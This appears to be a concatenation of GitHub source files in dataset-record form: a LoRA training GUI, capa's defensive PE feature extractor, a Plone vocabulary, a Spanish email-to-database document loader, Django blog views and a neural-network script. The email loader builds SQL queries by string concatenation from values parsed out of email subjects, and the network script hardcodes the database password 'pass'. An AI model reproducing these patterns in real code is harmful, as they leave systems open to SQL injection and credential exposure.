args[self.name]['dataset_args']\n\n # base model args\n self.widget.base_model_input.setText(args['pretrained_model_name_or_path'])\n\n # v2 args\n self.widget.v2_enable.setChecked(args.get('v2', False))\n self.widget.v_param_enable.setChecked(args.get(\"v_parameterization\", False))\n self.widget.v_pred_enable.setChecked(args.get('scale_v_pred_loss_like_noise_pred', False))\n self.enable_disable_sd2(self.widget.v2_enable.isChecked())\n\n # resolution args\n if isinstance(dataset_args['resolution'], list):\n self.widget.height_input.setEnabled(True)\n self.widget.height_enable.setChecked(True)\n self.widget.width_input.setValue(dataset_args['resolution'][0])\n self.widget.height_input.setValue(dataset_args['resolution'][1])\n else:\n self.widget.height_input.setEnabled(False)\n self.widget.height_enable.setChecked(False)\n self.widget.width_input.setValue(dataset_args['resolution'])\n\n # gradient args\n if \"gradient_checkpointing\" in args or 'gradient_accumulation_steps' in args:\n self.widget.gradient_box.setChecked(True)\n self.widget.gradient_selector.setCurrentIndex(0 if \"gradient_checkpointing\" in args else 1)\n self.widget.gradient_steps_input.setValue(args.get('gradient_accumulation_steps', 1))\n self.enable_disable_gradient(True)\n else:\n self.widget.gradient_box.setChecked(False)\n self.enable_disable_gradient(False)\n\n self.widget.seed_input.setValue(args['seed'])\n self.widget.clip_skip_input.setValue(args['clip_skip'])\n self.widget.loss_weight_input.setValue(args['prior_loss_weight'])\n self.widget.xformers_enable.setChecked(args.get(\"xformers\", False))\n self.widget.cache_latents_to_disk_enable.setChecked(args.get(\"cache_latents_to_disk\", False))\n self.enable_cache_latents(args.get(\"cache_latents\", False))\n self.widget.cache_latents_enable.setChecked(args.get(\"cache_latents\", False))\n self.widget.batch_size_input.setValue(dataset_args['batch_size'])\n token_len = args['max_token_length']\n index = 0 if token_len == 225 else 1 if token_len == 150 else 2\n self.widget.max_token_selector.setCurrentIndex(index)\n train_prec = args['mixed_precision']\n index = 0 if train_prec == 'fp16' else 1 if train_prec == 'bf16' else 2\n self.widget.mixed_precision_selector.setCurrentIndex(index)\n index = 0 if args.get(\"max_train_epochs\") else 1\n self.widget.max_train_selector.setCurrentIndex(index)\n self.widget.max_train_input.setValue(args['max_train_epochs'] if index == 0 else args['max_train_steps'])\n checked = True if args.get('training_comment', False) else False\n self.widget.comment_input.setText(args.get('training_comment', \"\"))\n self.widget.comment_enable.setChecked(checked)\n self.enable_disable_comment(checked)\n\n def save_args(self) -> Union[dict, None]:\n return self.args\n\n def save_dataset_args(self) -> Union[dict, None]:\n return self.dataset_args\n","repo_name":"derrian-distro/LoRA_Easy_Training_Scripts","sub_path":"main_ui_files/GeneralUI.py","file_name":"GeneralUI.py","file_ext":"py","file_size_in_byte":13956,"program_lang":"python","lang":"en","doc_type":"code","stars":738,"dataset":"github-code","pt":"47"} +{"seq_id":"31049646345","text":"import logging\nfrom pathlib import Path\n\nimport pefile\n\nimport capa.features.common\nimport capa.features.extractors\nimport capa.features.extractors.common\nimport capa.features.extractors.helpers\nimport capa.features.extractors.strings\nfrom capa.features.file import Export, Import, Section\nfrom capa.features.common import OS, ARCH_I386, FORMAT_PE, ARCH_AMD64, OS_WINDOWS, Arch, Format, Characteristic\nfrom capa.features.address import NO_ADDRESS, FileOffsetAddress, AbsoluteVirtualAddress\nfrom capa.features.extractors.base_extractor import FeatureExtractor\n\nlogger = logging.getLogger(__name__)\n\n\ndef extract_file_embedded_pe(buf, **kwargs):\n for offset, _ in capa.features.extractors.helpers.carve_pe(buf, 1):\n yield Characteristic(\"embedded pe\"), FileOffsetAddress(offset)\n\n\ndef extract_file_export_names(pe, **kwargs):\n base_address = pe.OPTIONAL_HEADER.ImageBase\n\n if hasattr(pe, \"DIRECTORY_ENTRY_EXPORT\"):\n for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:\n if not export.name:\n continue\n try:\n name = export.name.partition(b\"\\x00\")[0].decode(\"ascii\")\n except UnicodeDecodeError:\n continue\n\n if export.forwarder is None:\n va = base_address + export.address\n yield Export(name), AbsoluteVirtualAddress(va)\n\n else:\n try:\n forwarded_name = export.forwarder.partition(b\"\\x00\")[0].decode(\"ascii\")\n except UnicodeDecodeError:\n continue\n forwarded_name = capa.features.extractors.helpers.reformat_forwarded_export_name(forwarded_name)\n va = base_address + export.address\n yield Export(forwarded_name), AbsoluteVirtualAddress(va)\n yield Characteristic(\"forwarded export\"), AbsoluteVirtualAddress(va)\n\n\ndef extract_file_import_names(pe, **kwargs):\n \"\"\"\n extract imported function names\n 1. imports by ordinal:\n - modulename.#ordinal\n 2. imports by name, results in two features to support importname-only matching:\n - modulename.importname\n - importname\n \"\"\"\n if hasattr(pe, \"DIRECTORY_ENTRY_IMPORT\"):\n for dll in pe.DIRECTORY_ENTRY_IMPORT:\n try:\n modname = dll.dll.partition(b\"\\x00\")[0].decode(\"ascii\")\n except UnicodeDecodeError:\n continue\n\n # strip extension\n modname = modname.rpartition(\".\")[0].lower()\n\n for imp in dll.imports:\n if imp.import_by_ordinal:\n impname = f\"#{imp.ordinal}\"\n else:\n try:\n impname = imp.name.partition(b\"\\x00\")[0].decode(\"ascii\")\n except UnicodeDecodeError:\n continue\n\n for name in capa.features.extractors.helpers.generate_symbols(modname, impname):\n yield Import(name), AbsoluteVirtualAddress(imp.address)\n\n\ndef extract_file_section_names(pe, **kwargs):\n base_address = pe.OPTIONAL_HEADER.ImageBase\n\n for section in pe.sections:\n try:\n name = section.Name.partition(b\"\\x00\")[0].decode(\"ascii\")\n except UnicodeDecodeError:\n continue\n\n yield Section(name), AbsoluteVirtualAddress(base_address + section.VirtualAddress)\n\n\ndef extract_file_strings(buf, **kwargs):\n yield from capa.features.extractors.common.extract_file_strings(buf)\n\n\ndef extract_file_function_names(**kwargs):\n \"\"\"\n extract the names of statically-linked library functions.\n \"\"\"\n if False:\n # using a `yield` here to force this to be a generator, not function.\n yield NotImplementedError(\"pefile doesn't have library matching\")\n return\n\n\ndef extract_file_os(**kwargs):\n # assuming PE -> Windows\n # though i suppose they're also used by UEFI\n yield OS(OS_WINDOWS), NO_ADDRESS\n\n\ndef extract_file_format(**kwargs):\n yield Format(FORMAT_PE), NO_ADDRESS\n\n\ndef extract_file_arch(pe, **kwargs):\n if pe.FILE_HEADER.Machine == pefile.MACHINE_TYPE[\"IMAGE_FILE_MACHINE_I386\"]:\n yield Arch(ARCH_I386), NO_ADDRESS\n elif pe.FILE_HEADER.Machine == pefile.MACHINE_TYPE[\"IMAGE_FILE_MACHINE_AMD64\"]:\n yield Arch(ARCH_AMD64), NO_ADDRESS\n else:\n logger.warning(\"unsupported architecture: %s\", pefile.MACHINE_TYPE[pe.FILE_HEADER.Machine])\n\n\ndef extract_file_features(pe, buf):\n \"\"\"\n extract file features from given workspace\n\n args:\n pe (pefile.PE): the parsed PE\n buf: the raw sample bytes\n\n yields:\n Tuple[Feature, VA]: a feature and its location.\n \"\"\"\n\n for file_handler in FILE_HANDLERS:\n # file_handler: type: (pe, bytes) -> Iterable[Tuple[Feature, Address]]\n for feature, va in file_handler(pe=pe, buf=buf): # type: ignore\n yield feature, va\n\n\nFILE_HANDLERS = (\n extract_file_embedded_pe,\n extract_file_export_names,\n extract_file_import_names,\n extract_file_section_names,\n extract_file_strings,\n extract_file_function_names,\n extract_file_format,\n)\n\n\ndef extract_global_features(pe, buf):\n \"\"\"\n extract global features from given workspace\n\n args:\n pe (pefile.PE): the parsed PE\n buf: the raw sample bytes\n\n yields:\n Tuple[Feature, VA]: a feature and its location.\n \"\"\"\n for handler in GLOBAL_HANDLERS:\n # file_handler: type: (pe, bytes) -> Iterable[Tuple[Feature, Address]]\n for feature, va in handler(pe=pe, buf=buf): # type: ignore\n yield feature, va\n\n\nGLOBAL_HANDLERS = (\n extract_file_os,\n extract_file_arch,\n)\n\n\nclass PefileFeatureExtractor(FeatureExtractor):\n def __init__(self, path: Path):\n super().__init__()\n self.path: Path = path\n self.pe = pefile.PE(str(path))\n\n def get_base_address(self):\n return AbsoluteVirtualAddress(self.pe.OPTIONAL_HEADER.ImageBase)\n\n def extract_global_features(self):\n buf = Path(self.path).read_bytes()\n\n yield from extract_global_features(self.pe, buf)\n\n def extract_file_features(self):\n buf = Path(self.path).read_bytes()\n\n yield from extract_file_features(self.pe, buf)\n\n def get_functions(self):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def extract_function_features(self, f):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def get_basic_blocks(self, f):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def extract_basic_block_features(self, f, bb):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def get_instructions(self, f, bb):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def extract_insn_features(self, f, bb, insn):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def is_library_function(self, va):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def get_function_name(self, va):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n","repo_name":"mandiant/capa","sub_path":"capa/features/extractors/pefile.py","file_name":"pefile.py","file_ext":"py","file_size_in_byte":7336,"program_lang":"python","lang":"en","doc_type":"code","stars":3385,"dataset":"github-code","pt":"47"} +{"seq_id":"33646639592","text":"import gzip\nimport json\nimport os\nfrom plone import api\nfrom plone.app.vocabularies.types import BAD_TYPES\nfrom Products.CMFPlone.utils import safe_unicode\nfrom zope.interface import implementer\nfrom zope.schema.interfaces import IVocabularyFactory\nfrom zope.schema.vocabulary import SimpleVocabulary\nfrom zope.schema.vocabulary import SimpleTerm\n\n\nwith gzip.open(\n os.path.join(os.path.dirname(__file__), \"browser/static/styles.json.gz\")\n) as styles_file:\n styles_data = json.load(styles_file)\n\ncitations_vocab = SimpleVocabulary(\n [\n SimpleTerm(title=i[\"title\"], value=i[\"name\"], token=str(i[\"name\"]))\n for i in styles_data\n ]\n)\n\n# Build a very simple text index of the style titles\ncitations_text_index = {}\nfor item in styles_data:\n for word in item[\"title\"].lower().split():\n word = word.strip()\n if len(word) > 3:\n matches = citations_text_index.setdefault(word, [])\n matches.append(item[\"name\"])\n\n\n@implementer(IVocabularyFactory)\nclass SearchableCitationStylesVocabulary(object):\n items = citations_vocab\n\n def __call__(self, context, query=None):\n if query is None:\n return self.items\n term_matches = matches = set()\n words = query.split()\n for i, word in enumerate(words):\n word = word.lower().strip()\n if not word:\n continue\n term_matches.update(citations_text_index.get(word, []))\n # Treat the last word as a wildcard if we don't have a match\n if not term_matches and len(word) >= 3 and i == (len(words) - 1):\n for entry in citations_text_index:\n if word in entry:\n term_matches.update(citations_text_index.get(entry))\n if matches is not term_matches:\n matches = matches.intersection(term_matches)\n term_matches = set()\n terms = [self.items.getTerm(v) for v in matches]\n terms.sort(key=lambda t: t.title.lower())\n return SimpleVocabulary(terms)\n\n\nCitationStylesVocabularyFactory = SearchableCitationStylesVocabulary()\n\n\n@implementer(IVocabularyFactory)\nclass TypesTitlesVocabulary(object):\n bad_types = set(BAD_TYPES)\n\n def __call__(self, context):\n catalog = api.portal.get_tool('portal_catalog')\n titles = [\n t for t in catalog.uniqueValuesFor('Type') if t and t not in self.bad_types\n ]\n terms = [SimpleTerm(t, title=safe_unicode(t), token=t) for t in titles]\n terms.sort(key=lambda t: t.value)\n return SimpleVocabulary(terms)\n\n\nTypesTitlesVocabularyFactory = TypesTitlesVocabulary()\n","repo_name":"jazkarta/jazkarta.zoterolib","sub_path":"src/jazkarta/zoterolib/vocabs.py","file_name":"vocabs.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15290553039","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport datetime, re\nfrom configparser import ConfigParser\nfrom models.reg import reg\nfrom common.funciones import Funcion\n\nEmp = \"\"\nano = 0\nmes = 0\ndia = 0\n\ndatenow = datetime.datetime.now()\nhournow = str(datenow.hour) + \":\" + str(datenow.minute) + \":\" + str(datenow.second)\n\nconfig = ConfigParser()\nconfig.read('config/config.ini')\ncorreo = config.get('personal','CORREO_O')\npassword = config.get('personal','PASS')\ncarpeta = config.get('doc_soporte','IMAP_NA')\ncargue_string = config.get('correo_confirmacion','CARGUE_NOTA_AJUSTE')\nerror_string = config.get('correo_error','ERROR_NOTA_AJUSTE')\n\nclass NotaAjuste:\n\n def leer_correos_nota_ajuste(self, con, env):\n cursor = con.cursor()\n conexion = con\n enviar = env\n cambio = re.sub(\"_\", \" \", carpeta)\n\n Funcion(cursor, conexion, enviar).get_datos_centro_costo()\n data_correos = Funcion(cursor, conexion, enviar).analizar_correo(correo, password, carpeta)\n\n if data_correos != None:\n for dato in data_correos:\n asunto = dato[\"asunto\"]\n filename = dato[\"filename\"]\n valida_asunto = Funcion(cursor, conexion, enviar).validar_asunto_correo(\"N\", asunto)\n if valida_asunto != False:\n empresa_codigo = valida_asunto[\"empresa_codigo\"]\n documento = valida_asunto[\"cod_doc_asunto\"]\n empresa = valida_asunto[\"empresa\"]\n if valida_asunto is False:\n mensaje = \"\\033[91mEl Asunto no es correcto o esta mal formado (no tiene el numero de documento \" \\\n \"soporte), se envía correo y se detiene el proceso\\033[0m\\n\"\n print(mensaje)\n break\n datos_nota_ajuste = self.get_datos_nota_ajuste(cursor, empresa_codigo, documento, empresa)\n nota_ajuste = datos_nota_ajuste[\"cod_nota_ajuste\"]\n ruta = datos_nota_ajuste[\"digitalizado_ruta\"]\n if datos_nota_ajuste is False:\n mensaje = \"\\033[91No se lograron obtener datos de la \" + cambio.upper() + \"\\033[0m\"\n print(mensaje)\n break\n insert_digi = Funcion(cursor, conexion, enviar).insertar_digitalizado(346, 285, nota_ajuste, ruta, filename, cargue_string, error_string)\n if insert_digi:\n archivo_zip = insert_digi\n self.actualizar_nota_ajuste(cursor, conexion, archivo_zip, nota_ajuste)\n Funcion(cursor, conexion, enviar).eventos(nota_ajuste, 346)\n mensaje = \"\\033[91mNo existen mensajes sin leer en la cuenta \" + correo + \" en la carpeta \" + cambio.upper() + \"\\033[0m\"\n print (mensaje)\n mensaje = \"\\033[93m*********************************************** Proceso Finalizado \" + cambio.upper() + \" ***********************************************\\033[0m\\n\\n\"\n print (mensaje)\n\n def get_datos_nota_ajuste(self, cursor, empresa_codigo, nota_ajuste, empresa):\n global detach_dir, detach_dir1, cod_nota_ajuste, cencos_nota_ajuste, fecha_nota_ajuste, ano, mes, dia\n nota_ajuste_sql = \"SELECT na.notaju_codigo, na.notaju_fechacreacion, na. docsop_codigo, na.empresa_codigo, na.cencos_codigo FROM tb_notaajuste na WHERE na.empresa_codigo = \" + str(empresa_codigo) + \" AND na.notaju_cencoscodigo = \"+ str(nota_ajuste)\n mensaje = \"\\033[94mConsulta de la Nota Ajuste de la Empresa \" + str(empresa_codigo) + \" DigCCResolucion \" + str(nota_ajuste) + \" ejecutada con éxito\\033[0m\"\n try:\n print(\"\\033[94m######################### SQL get_datos() #################################\\033[0m\")\n print (\"\\033[94m\" + nota_ajuste_sql + \"\\033[0m\")\n cursor.execute(nota_ajuste_sql)\n print (mensaje)\n outfile = '.'\n ContAux = 0\n for row in cursor.fetchall():\n r = reg(cursor, row)\n cod_nota_ajuste = r.notaju_codigo\n cencos_nota_ajuste = r.cencos_codigo\n fecha_nota_ajuste = str(r.notaju_fechacreacion)\n ano = fecha_nota_ajuste.split(\"-\")[0]\n mes = fecha_nota_ajuste.split(\"-\")[1]\n dia = fecha_nota_ajuste.split(\"-\")[2]\n digitalizado_ruta = '/usr/local/apache/htdocs/switrans/images/documentosoporte/' + str(empresa) + '/' + str(\n ano) + '/' + str(cencos_nota_ajuste) + '/' + str(mes) + '/'\n ContAux = ContAux + 1\n print(\"\\033[92m######################### RESULTADO SQL get_datos() #################################\\033[0m\\n\" + \"\\033[92mnotaju_codigo = \" + str(\n cod_nota_ajuste) + \"\\n\" + \"cencos_codigo = \" + str(cencos_nota_ajuste) + \"\\n\" + \"notaju_fechacreacion = \" + fecha_nota_ajuste + \"\\033[0m\\n\")\n if ContAux > 0:\n datos_nota_ajuste = {\n \"cod_nota_ajuste\": cod_nota_ajuste,\n \"digitalizado_ruta\": digitalizado_ruta\n }\n return datos_nota_ajuste\n else:\n return False\n except psycopg2.Error as e:\n print(e.pgerror)\n return False\n\n def actualizar_nota_ajuste(self, cursor, conexion, filename, nota_ajuste):\n updateNotaAjuste = (\n \"UPDATE tb_notaajuste SET archivo_notaajuste_electronico = '\" + filename + \"' WHERE notaju_codigo = \" + str(\n nota_ajuste))\n try:\n cursor.execute(updateNotaAjuste)\n conexion.commit()\n mensaje = \"\\033[93mNota Ajuste Actualizada a base de datos tb_notaajuste, campo: archivo_notaajuste_electronico \\n._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._\\033[0m\"\n print(mensaje)\n except psycopg2.Error as e:\n mensaje = e.pgerror\n print(mensaje)\n print(\"ERROR FATAL EN LA CONSULTA \" + str(updateNotaAjuste))\n errorFile = 1","repo_name":"ojcarrillomiranda/lector-de-correos","sub_path":"models/nota_ajuste.py","file_name":"nota_ajuste.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31338937012","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Category, Tag, Post\nfrom django.db.models import Q, F\nfrom django.core.paginator import Paginator\n\n# Create your views here.\n\n\ndef index(request):\n # 查询首页数据并显示在页面\n\n post_list = Post.objects.all() # 查询到所有的文章\n # 分页方法\n paginator = Paginator(post_list, 4) # 第二个参数2代表每页显示几个\n page_number = request.GET.get('page') #?page = 1 (页码)\n page_obj = paginator.get_page(page_number)\n context = {'post_list': post_list, 'page_obj': page_obj}\n return render(request, 'blog/index.html', context)\n\n\ndef category_list(request, category_id):\n category = get_object_or_404(Category, id=category_id)\n # 获取当前分类下的所有文章\n posts = category.post_set.all()\n paginator = Paginator(posts, 2) # 第二个参数2代表每页显示几个\n page_number = request.GET.get('page') # http://assas.co/?page=1 (页码)\n page_obj = paginator.get_page(page_number)\n context = {'category': category, 'page_obj': page_obj}\n return render(request, 'blog/list.html', context)\n\n\ndef post_detail(request, post_id):\n # 文章详情页\n post = get_object_or_404(Post, id=post_id)\n\n prev_post = Post.objects.filter(id__lt=post_id).last() # 上一篇queryset\n next_post = Post.objects.filter(id__gt=post_id).first() # 下一篇queryset\n\n Post.objects.filter(id=post_id).update(Browse_rate=F('Browse_rate') + 1)\n context = {'post': post, 'prev_post': prev_post, 'next_post': next_post}\n return render(request, 'blog/detail.html', context)\n\n\ndef search(request):\n \"\"\"搜索视图\"\"\"\n keyword = request.GET.get('keyword')\n # 没有搜索默认显示文章\n if not keyword:\n post_list = Post.objects.all()\n else:\n post_list = Post.objects.filter(Q(title__icontains=keyword) | Q(desc__icontains=keyword))\n paginator = Paginator(post_list, 2) # 第二个参数2代表每页显示几个\n page_number = request.GET.get('page') # http://assas.co/?page=1 (页码)\n page_obj = paginator.get_page(page_number)\n context = {\n 'page_obj': page_obj\n }\n return render(request, 'blog/index.html', context)\n\n\ndef archives(request, year, month):\n #文章归档\n post_list = Post.objects.filter(add_date__year=year, add_date__month=month)\n context = {'post_list': post_list, 'year': year, 'month': month}\n return render(request, 'blog/sidebar/archives_list.html', context)\n","repo_name":"Asukaki7/PersonalBlog","sub_path":"mysite/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74073027662","text":"# %load network.py\n\n\"\"\"\nnetwork.py\n~~~~~~~~~~\nIT WORKS\n\nA module to implement the stochastic gradient descent learning\nalgorithm for a feedforward neural network. Gradients are calculated\nusing backpropagation. Note that I have focused on making the code\nsimple, easily readable, and easily modifiable. It is not optimized,\nand omits many desirable features.\n\"\"\"\n\n#### Libraries\n# Standard library\nimport random\n\n# Third-party libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\n\n# SQL Database Code\nimport mysql.connector\n\ntry:\n db = mysql.connector.connect(\n host=\"localhost\",\n username=\"root\",\n password=\"pass\",\n database=\"networkdatabase\"\n )\n mycursor = db.cursor(buffered=True)\n print(\"Successfully Connected to Database\")\nexcept:\n print(\"ERR: Could not connect to database\")\n\n\n# Change Graph Style\nstyle.use(\"ggplot\")\n\nclass Network(object):\n\n def __init__(self, sizes):\n \"\"\"The list ``sizes`` contains the number of neurons in the\n respective layers of the network. For example, if the list\n was [2, 3, 1] then it would be a three-layer network, with the\n first layer containing 2 neurons, the second layer 3 neurons,\n and the third layer 1 neuron. The biases and weights for the\n network are initialized randomly, using a Gaussian\n distribution with mean 0, and variance 1. Note that the first\n layer is assumed to be an input layer, and by convention we\n won't set any biases for those neurons, since biases are only\n ever used in computing the outputs from later layers.\"\"\"\n self.num_layers = len(sizes)\n self.sizes = sizes\n self.biases = [np.random.randn(y, 1) for y in sizes[1:]]\n self.weights = [np.random.randn(y, x)\n for x, y in zip(sizes[:-1], sizes[1:])]\n\n def feedforward(self, a):\n \"\"\"Return the output of the network if ``a`` is input.\"\"\"\n for b, w in zip(self.biases, self.weights):\n a = sigmoid(np.dot(w, a)+b)\n return a\n\n def SGD(self, training_data, epochs, mini_batch_size, eta,\n test_data=None):\n \"\"\"Train the neural network using mini-batch stochastic\n gradient descent. The ``training_data`` is a list of tuples\n ``(x, y)`` representing the training inputs and the desired\n outputs. The other non-optional parameters are\n self-explanatory. If ``test_data`` is provided then the\n network will be evaluated against the test data after each\n epoch, and partial progress printed out. This is useful for\n tracking progress, but slows things down substantially.\"\"\"\n\n self.accuracy = []\n self.epochs = epochs\n self.mini_batch_size = mini_batch_size\n self.eta = eta\n\n training_data = list(training_data)\n n = len(training_data)\n\n if test_data:\n test_data = list(test_data)\n n_test = len(test_data)\n\n for j in range(epochs):\n random.shuffle(training_data)\n mini_batches = [\n training_data[k:k+mini_batch_size]\n for k in range(0, n, mini_batch_size)]\n for mini_batch in mini_batches:\n self.update_mini_batch(mini_batch, eta)\n if test_data:\n print(\"Epoch {} : {} / {}\".format(j,self.evaluate(test_data),n_test))\n self.accuracy.append(round(self.evaluate(test_data)*100/n_test,2))\n\n else:\n print(\"Epoch {} complete\".format(j))\n\n def update_mini_batch(self, mini_batch, eta):\n \"\"\"Update the network's weights and biases by applying\n gradient descent using backpropagation to a single mini batch.\n The ``mini_batch`` is a list of tuples ``(x, y)``, and ``eta``\n is the learning rate.\"\"\"\n nabla_b = [np.zeros(b.shape) for b in self.biases]\n nabla_w = [np.zeros(w.shape) for w in self.weights]\n for x, y in mini_batch:\n delta_nabla_b, delta_nabla_w = self.backprop(x, y)\n nabla_b = [nb+dnb for nb, dnb in zip(nabla_b, delta_nabla_b)]\n nabla_w = [nw+dnw for nw, dnw in zip(nabla_w, delta_nabla_w)]\n self.weights = [w-(eta/len(mini_batch))*nw\n for w, nw in zip(self.weights, nabla_w)]\n self.biases = [b-(eta/len(mini_batch))*nb\n for b, nb in zip(self.biases, nabla_b)]\n\n def backprop(self, x, y):\n \"\"\"Return a tuple ``(nabla_b, nabla_w)`` representing the\n gradient for the cost function C_x. ``nabla_b`` and\n ``nabla_w`` are layer-by-layer lists of numpy arrays, similar\n to ``self.biases`` and ``self.weights``.\"\"\"\n nabla_b = [np.zeros(b.shape) for b in self.biases]\n nabla_w = [np.zeros(w.shape) for w in self.weights]\n # feedforward\n activation = x\n activations = [x] # list to store all the activations, layer by layer\n zs = [] # list to store all the z vectors, layer by layer\n for b, w in zip(self.biases, self.weights):\n z = np.dot(w, activation)+b\n zs.append(z)\n activation = sigmoid(z)\n activations.append(activation)\n # backward pass\n delta = self.cost_derivative(activations[-1], y) * \\\n sigmoid_prime(zs[-1])\n nabla_b[-1] = delta\n nabla_w[-1] = np.dot(delta, activations[-2].transpose())\n # Note that the variable l in the loop below is used a little\n # differently to the notation in Chapter 2 of the book. Here,\n # l = 1 means the last layer of neurons, l = 2 is the\n # second-last layer, and so on. It's a renumbering of the\n # scheme in the book, used here to take advantage of the fact\n # that Python can use negative indices in lists.\n for l in range(2, self.num_layers):\n z = zs[-l]\n sp = sigmoid_prime(z)\n delta = np.dot(self.weights[-l+1].transpose(), delta) * sp\n nabla_b[-l] = delta\n nabla_w[-l] = np.dot(delta, activations[-l-1].transpose())\n return (nabla_b, nabla_w)\n\n def evaluate(self, test_data):\n \"\"\"Return the number of test inputs for which the neural\n network outputs the correct result. Note that the neural\n network's output is assumed to be the index of whichever\n neuron in the final layer has the highest activation.\"\"\"\n test_results = [(np.argmax(self.feedforward(x)), y)\n for (x, y) in test_data]\n return sum(int(x == y) for (x, y) in test_results)\n\n def cost_derivative(self, output_activations, y):\n \"\"\"Return the vector of partial derivatives \\partial C_x /\n \\partial a for the output activations.\"\"\"\n return (output_activations-y)\n\n def plotAccuracy(self):\n plt.plot(self.accuracy)\n plt.ylabel('accuracy (%)')\n plt.xlabel('Number of Epochs (from 0)')\n plt.show()\n\n def findMax(self):\n self.epochPos = 0\n #must have arrayName[index].fieldName (since it is an array of records)\n self.maxi = self.accuracy[0]\n \n for i in range(1,self.epochs):\n\n if self.accuracy[i] > self.maxi:\n self.maxi = self.accuracy[i]\n self.epochPos = i\n\n def outputResults(self,networkName):\n with open(\"results.txt\",\"a\") as writefile:\n #modelID, modelName, numHidden, epochs, mini_batch_size, eta, modelID2, currentAccuracy, maxAccuracy, maxAccuracyEpoch, accuracyArray = x\n line = (networkName+\",\"+ str(self.sizes[1]) + \",\" + str(self.epochs) +\",\" + str(self.mini_batch_size) + \",\" + str(self.eta) + \",\" + str(self.accuracy[len(self.accuracy)-1]) + \",\" + str(self.maxi) + \",\" + str(self.epochPos) + \",\" + str(self.accuracy) + \"\\n\")\n writefile.write(line)\n\n #---- WRONG ORDER-------\n # #name, current accuracy, max accuracy, max accuracy epoch, accuracyArray, numHidden, epochs, mini_batch_size, eta\n # line = (networkName+\",\"+ str(self.accuracy[len(self.accuracy)-1]) + \",\" + str(self.maxi) +\",\" + str(self.epochPos) + \",\" + str(self.accuracy) + \",\" + str(self.sizes[1]) + \",\" + str(self.epochs) + \",\" + str(self.mini_batch_size) + \",\" + str(self.eta) + \"\\n\")\n # writefile.write(line)\n\n writefile.close()\n\n def writeModel(self,networkName):\n try:\n insertModel = \"INSERT INTO Models (modelName, numHidden, epochs, mini_batch_size, eta) VALUES (%s,%s,%s,%s,%s)\"\n mycursor.execute(insertModel,(networkName, str(self.sizes[1]), str(self.epochs), str(self.mini_batch_size), str(self.eta)))\n db.commit()\n\n last_id = mycursor.lastrowid\n # print(last_id)\n\n insertAccuracy = \"INSERT INTO Accuracy (modelID, currentAccuracy, maxAccuracy, maxAccuracyEpoch, accuracyArray) VALUES (%s,%s,%s,%s,%s)\"\n mycursor.execute(insertAccuracy,(last_id,str(self.accuracy[len(self.accuracy)-1]),str(self.maxi),str(self.epochPos),str(self.accuracy)))\n db.commit()\n except:\n print(\"ERROR: Unable to Insert\")\n \n \n def databaseToFile(self):\n mycursor.execute(\"SELECT * FROM Models, Accuracy WHERE Models.ID = Accuracy.modelID\")\n #print(\"Loop1\")\n\n with open(\"results.txt\",\"a\") as writefile:\n #print(\"Loop2\")\n for x in mycursor:\n #print(\"Loop3\")\n modelID, modelName, numHidden, epochs, mini_batch_size, eta, modelID2, currentAccuracy, maxAccuracy, maxAccuracyEpoch, accuracyArray = x\n #name, current accuracy, max accuracy, max accuracy epoch, accuracyArray numHidden, epochs, mini_batch_size, eta\n line = (modelName+\",\"+ str(numHidden) + \",\" + str(epochs) +\",\" + str(mini_batch_size) + \",\" + str(eta) + \",\" + str(currentAccuracy) + \",\" + str(maxAccuracy) + \",\" + str(maxAccuracyEpoch) + \",\" + str(accuracyArray) +\"\\n\")\n # WRONG ORDER line = (modelName+\",\"+ str(currentAccuracy) + \",\" + str(maxAccuracy) +\",\" + str(maxAccuracyEpoch) + \",\" + str(accuracyArray) + \",\" + str(numHidden) + \",\" + str(epochs) + \",\" + str(mini_batch_size) + \",\" + str(eta) +\"\\n\")\n writefile.write(line)\n\n writefile.close()\n\n\n def getModel(self,queryID,queryName,queryAccuracy):\n searchModel = \"SELECT modelID, modelName, numHidden, epochs, mini_batch_size, eta, currentAccuracy, maxAccuracy, maxAccuracyEpoch, accuracyArray FROM Models, Accuracy WHERE Models.ID = Accuracy.modelID AND modelID LIKE %s AND modelName LIKE %s AND maxAccuracy LIKE %s\"\n print(queryAccuracy)\n #mycursor.execute(searchModel)\n mycursor.execute(searchModel, (\"%\" + queryID + \"%\",\"%\" + queryName + \"%\", queryAccuracy + \"%\"))\n rows = mycursor.fetchall()\n rowCount = mycursor.rowcount\n # for x in mycursor:\n # print(x)\n # print(\"Total Data Entries: \",rowCount)\n\n return rows,rowCount\n \n def deleteModel(self,ID):\n queryRecordExists = \"SELECT COUNT(1) FROM Models WHERE ID = %s\"\n mycursor.execute(queryRecordExists, (str(ID),))\n recordExists = mycursor.fetchall()\n print(recordExists)\n if recordExists == [(1,)]:\n deleteQueryAccuracy = \"DELETE FROM Accuracy WHERE modelID = %s\"\n deleteQueryModels = \"DELETE FROM Models WHERE ID = %s\"\n mycursor.execute(deleteQueryAccuracy, (str(ID),))\n mycursor.execute(deleteQueryModels, (str(ID),))\n db.commit()\n print(\"Record\" ,ID, \"Deleted\")\n return True\n return False\n\n \n def showDatabase(self):\n # mycursor.execute(\"SELECT * FROM Models, Accuracy WHERE Models.ID = Accuracy.modelID\") - This includes modelID twice\n mycursor.execute(\"SELECT modelID, modelName, numHidden, epochs, mini_batch_size, eta, currentAccuracy, maxAccuracy, maxAccuracyEpoch, 